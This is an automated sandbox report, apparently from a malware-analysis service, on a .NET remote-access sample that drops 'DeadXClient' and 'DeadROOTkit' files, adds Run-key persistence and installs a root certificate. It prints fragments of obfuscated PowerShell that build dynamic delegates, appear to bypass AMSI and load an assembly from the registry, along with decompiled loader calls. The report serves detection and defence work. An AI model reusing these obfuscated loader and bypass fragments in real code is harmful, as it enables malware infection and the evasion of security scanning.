Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: mscoree.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: version.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: sspicli.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\spoolsv.exe Section loaded: pdh.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Deadsvchost.lnk.1.dr LNK file: ..\..\..\..\..\..\..\..\Public\Deadsvchost.exe
Source: DeadROOTkit.lnk.2.dr LNK file: ..\..\..\..\..\..\Local\DeadROOTkit.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: mIURiU8n2P.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: mIURiU8n2P.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: DeadXClient.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: DeadXClient.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: DeadROOTkit.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: DeadROOTkit.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: DeadROOTkit.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: Deadsvchost.exe.1.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Deadsvchost.exe.1.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: DeadROOTkit.exe.2.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: DeadROOTkit.exe.2.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: DeadROOTkit.exe.2.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
.NET source code contains potential unpacker
Source: DeadXClient.exe.0.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: DeadXClient.exe.0.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: DeadXClient.exe.0.dr, Messages.cs .Net Code: Memory
Source: DeadROOTkit.exe.0.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: DeadROOTkit.exe.0.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: DeadROOTkit.exe.0.dr, Messages.cs .Net Code: Memory
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs .Net Code: Memory
Source: Deadsvchost.exe.1.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: Deadsvchost.exe.1.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: Deadsvchost.exe.1.dr, Messages.cs .Net Code: Memory
Source: DeadROOTkit.exe.2.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: DeadROOTkit.exe.2.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: DeadROOTkit.exe.2.dr, Messages.cs .Net Code: Memory
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($LadMSRasXMAaNc,$SsrFUvzfWALaJuFfDwp).Invoke(''+'a'+''+[Char](109)+''+'s'+'i.'+[Char](100)+'ll');$BNdTdCEoXMsXuDwEG=$zjaDRBJuPBhArz.Invoke($Null,@([Object]$HSvqCok,[Objec
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](68)+'e'+'a'+''+'d'+''+[Char](115)+''+'t'+'a'+[Cha
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\DeadXClient.exe Code function: 1_2_00007FFD9B7F00AD pushad ; iretd 1_2_00007FFD9B7F00C1
Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B80885D pushad ; ret 2_2_00007FFD9B8088EB
Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B8088A8 pushad ; ret 2_2_00007FFD9B8088EB
Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B8000AD pushad ; iretd 2_2_00007FFD9B8000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7EDBB5 pushad ; iretd 4_2_00007FFD9B7EDC59
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7E63FB push ebx; retf 000Ah 4_2_00007FFD9B7E641A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7EDC35 pushad ; iretd 4_2_00007FFD9B7EDC59
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7EDC40 pushad ; iretd 4_2_00007FFD9B7EDC59
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7E00AD pushad ; iretd 4_2_00007FFD9B7E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BA651EB push ecx; iretd 4_2_00007FFD9BA651EC
Source: C:\Windows\System32\dllhost.exe Code function: 6_3_000002E86A0786ED push rcx; retf 003Fh 6_3_000002E86A0786EE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B6BD2A5 pushad ; iretd 7_2_00007FFD9B6BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B7D00AD pushad ; iretd 7_2_00007FFD9B7D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B8A2316 push 8B485F94h; iretd 7_2_00007FFD9B8A231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B8A26C9 pushad ; retf 7_2_00007FFD9B8A26E9
Source: C:\Windows\System32\winlogon.exe Code function: 11_3_00000225DC6286ED push rcx; retf 003Fh 11_3_00000225DC6286EE
Source: C:\Windows\System32\lsass.exe Code function: 12_3_00000202C0AC86ED push rcx; retf 003Fh 12_3_00000202C0AC86EE
Source: C:\Users\Public\Deadsvchost.exe Code function: 13_2_00007FFD9B8000AD pushad ; iretd 13_2_00007FFD9B8000C1
Source: C:\Windows\System32\svchost.exe Code function: 14_3_000002A6612E86ED push rcx; retf 003Fh 14_3_000002A6612E86EE
Source: C:\Windows\System32\dwm.exe Code function: 16_3_000002BAAF1F86ED push rcx; retf 003Fh 16_3_000002BAAF1F86EE
Source: C:\Windows\System32\svchost.exe Code function: 17_3_0000026A879A86ED push rcx; retf 003Fh 17_3_0000026A879A86EE
Source: C:\Windows\System32\svchost.exe Code function: 19_3_00000179537886ED push rcx; retf 003Fh 19_3_00000179537886EE
Source: C:\Windows\System32\svchost.exe Code function: 20_3_000002295D5486ED push rcx; retf 003Fh 20_3_000002295D5486EE

Persistence and Installation Behavior
barindex
Installs new ROOT certificates
Source: C:\Windows\System32\lsass.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\lsass.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Drops PE files
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadROOTkit.exe Jump to dropped file
Source: C:\Users\Public\DeadROOTkit.exe File created: C:\Users\user\AppData\Local\DeadROOTkit.exe Jump to dropped file
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadXClient.exe Jump to dropped file
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadCodeRootKit.exe Jump to dropped file
Source: C:\Users\Public\DeadXClient.exe File created: C:\Users\Public\Deadsvchost.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadROOTkit.exe Jump to dropped file
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadXClient.exe Jump to dropped file
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadCodeRootKit.exe Jump to dropped file
Source: C:\Users\Public\DeadXClient.exe File created: C:\Users\Public\Deadsvchost.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\Public\DeadXClient.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Deadsvchost Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DeadROOTkit Jump to behavior
Drops PE files to the user root directory
